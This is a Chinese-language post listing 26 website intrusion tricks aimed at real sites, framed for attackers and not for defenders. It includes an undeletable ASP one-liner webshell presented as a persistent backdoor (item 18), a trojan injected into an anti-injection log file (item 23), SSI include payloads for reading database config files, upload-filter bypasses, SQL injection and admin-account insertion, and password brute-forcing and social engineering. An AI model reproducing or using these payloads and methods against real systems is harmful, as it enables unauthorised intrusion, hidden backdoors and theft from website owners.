網(wǎng)站滲透技巧收集與總結(jié)
本文總結(jié)了一些常用的網(wǎng)站滲透技巧,希望對(duì)大家有所幫助。
1.利用網(wǎng)站過(guò)濾不嚴(yán)直接繞過(guò)后臺(tái)驗(yàn)證,在網(wǎng)站后面加上 admin/session.asp 或 admin/left.asp
2.有的網(wǎng)站進(jìn)后臺(tái)會(huì)出現(xiàn)一個(gè)腳本提示框,輸入:administrator 即可突破!admin代表以管理員身份進(jìn)入的意思。
3.有的網(wǎng)站開(kāi)了3389,入侵之前先去連接3389,嘗試弱口令或是爆破,再者就是按5次shift鍵,看看有沒(méi)前人裝過(guò)后門(mén),然后再社工密碼。
4.有時(shí)候進(jìn)后臺(tái)會(huì)彈出提示框“請(qǐng)登陸”,把地址抄寫(xiě)出來(lái)(復(fù)制不了),然后放在網(wǎng)頁(yè)源代碼分析器里,選擇瀏覽器-攔截跳轉(zhuǎn)勾選–查看即可進(jìn)入后臺(tái)!
5.突破防盜鏈訪(fǎng)問(wèn)webshell,代碼:
javascript:document.write("fuck")
回車(chē)后點(diǎn)擊GO即可進(jìn)入webshell
6.突破一流信息監(jiān)控?cái)r截系統(tǒng)訪(fǎng)問(wèn),當(dāng)小馬可以訪(fǎng)問(wèn),上傳大馬卻不行的時(shí)候,可以先用大馬跟一張圖片合并,在上傳合并后的圖片,接著數(shù)據(jù)庫(kù)備份后訪(fǎng)問(wèn)即可!
7.在拿編輯器的shell時(shí),有時(shí)增加了asp|asa|cer|php|aspx等擴(kuò)展名上傳時(shí)都被過(guò)濾了,其實(shí)只要增加aaspsp 上傳asp就會(huì)突破了。
8.有時(shí)啊D猜出表段了,但是猜不到字段的時(shí)候,可以到后臺(tái)查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段進(jìn)行猜解內(nèi)容即可突破。
9.社工后臺(tái)密碼可以用這個(gè)技巧,假如網(wǎng)站域名是:www.hx95.com管理員名稱(chēng)為hx95,可以試試密碼“hx95”和“www.hx95.com”來(lái)登陸。
10.手工注入時(shí)如果網(wǎng)站過(guò)濾了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 進(jìn)行判斷。
11.本地構(gòu)造上傳一句話(huà)木馬,如果提示“請(qǐng)先選擇你要上傳的文件![ 重新上傳 ]” ,說(shuō)明文件太小了,用記事本打開(kāi)再?gòu)?fù)制多幾句話(huà)從而擴(kuò)大文件大小,再上傳即可。12.用啊d跑表,跑字段名name和pass出不來(lái),顯示長(zhǎng)度超過(guò)50什么的,猜解不出的情況下,這時(shí)放在穿山甲去跑一般都能跑出來(lái)!
13.猜管理員后臺(tái)小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 會(huì)現(xiàn)出菜單導(dǎo)航,然后迅雷下載全部鏈接。
14.知道表名,字段,使用SQL語(yǔ)句在A(yíng)CCESS數(shù)據(jù)庫(kù)中加個(gè)用戶(hù)名及密碼語(yǔ)句:
Insert into admin(user,pwd)values('test','test')
15.當(dāng)獲得管理員密碼,卻拿不到管理員的帳號(hào)時(shí),到前臺(tái)隨便打開(kāi)一個(gè)新聞,找找諸如“提交者”“發(fā)布者”之類(lèi)的字眼,一般“提交者”就是管理員的帳號(hào)了。
16.爆破ASP+IIS架設(shè)的網(wǎng)站web絕對(duì)路徑,假設(shè)網(wǎng)站主頁(yè)為:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。
17.源碼的利用,很多網(wǎng)站用的都是網(wǎng)上下載的源碼,有的站長(zhǎng)很懶,什么也不改,然后就上傳開(kāi)通網(wǎng)站了,我們可以去下載一套,里面有很多默認(rèn)的信息值得利用。
18.把以下代碼上傳到webshell里,后綴是asp,就算別人發(fā)現(xiàn)了也刪除不了,算是超級(jí)防刪的一句話(huà)木馬了,可以很安全的留個(gè)后門(mén),菜刀連接密碼:x
- <%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Setf=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes<>3939then:f.attributes=39:endif%>
19.當(dāng)破解出帳號(hào)密碼卻找不到后臺(tái)的時(shí)候,可以嘗試鏈接ftp,假如域名是:www.baidu.com “ 得到的密碼為“bishi”,我們就可以試下用“xxxx”“xxxx.cn”www.xxxx.cn作為FTP 用戶(hù)名,用“bishi”:作為FTP密碼來(lái)進(jìn)行登陸,華夏聯(lián)盟成功的幾率可以很大的哦!ftp的默認(rèn)端口:21 默認(rèn)帳號(hào)密碼:test
20.有的后臺(tái)不顯示驗(yàn)證碼,難道就沒(méi)法登錄了么? 其實(shí)把一段代碼導(dǎo)入注冊(cè)表里就可以突破這個(gè)困境了,把下面的代碼保存為Code.reg,雙擊導(dǎo)入就可以了!
1 2 3 REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] "BlockXBM"=dword:00000000
21.當(dāng)網(wǎng)站不允許上傳 asp、asa、php等文件時(shí),我們可以上傳一個(gè)stm文件,代碼為:
- “<!--#include file=”conn.asp”-->”
(想查看什么文件就寫(xiě)什么文件名,這里我假設(shè)想查看“conn.asp”),
然后直接打開(kāi)這個(gè)stm文件的地址,再查看源代碼,“conn.asp”這個(gè)文件的代碼就一覽無(wú)遺了!
22.當(dāng)網(wǎng)站不允許上傳ASP,CGI,CER,CDX,HTR等類(lèi)型的文件時(shí),嘗試上傳一個(gè)shtm文件,內(nèi)容為:
- <!--#includ file="conn.asp"-->
如果上傳成功,那太好了,訪(fǎng)問(wèn)地址就可以瀏覽conn.asp里的內(nèi)容了,這樣一來(lái),數(shù)據(jù)庫(kù)路徑也就到手啦!
23.手工檢測(cè)注入點(diǎn)彈出“你的操作已被記錄!”之類(lèi)的信息,訪(fǎng)問(wèn)這個(gè)文件:sqlin.asp,如果存在,在注入點(diǎn)后面植入一句話(huà)木馬:
‘excute(request(“TNT”))
接著用一句話(huà)木馬客戶(hù)端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因?yàn)楹芏喾雷⑷氤绦蚨际怯?rdquo;sqlin.asp“這個(gè)文件名來(lái)做非法記錄的數(shù)據(jù)庫(kù)。
24.旁注的話(huà),肯定是挑支持aspx的站點(diǎn)來(lái)日了,問(wèn)題是怎樣判斷呢?方法很簡(jiǎn)單,在在網(wǎng)站后面加上x(chóng)xx.aspx,如果返回“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤,無(wú)法找到該資源,404畫(huà)面就說(shuō)明支持aspx木馬。
25.網(wǎng)站后面加test.php 可以查看版本
26.禁忌這兩個(gè)網(wǎng)站后臺(tái)文件 admin_index.asp manage_login.asp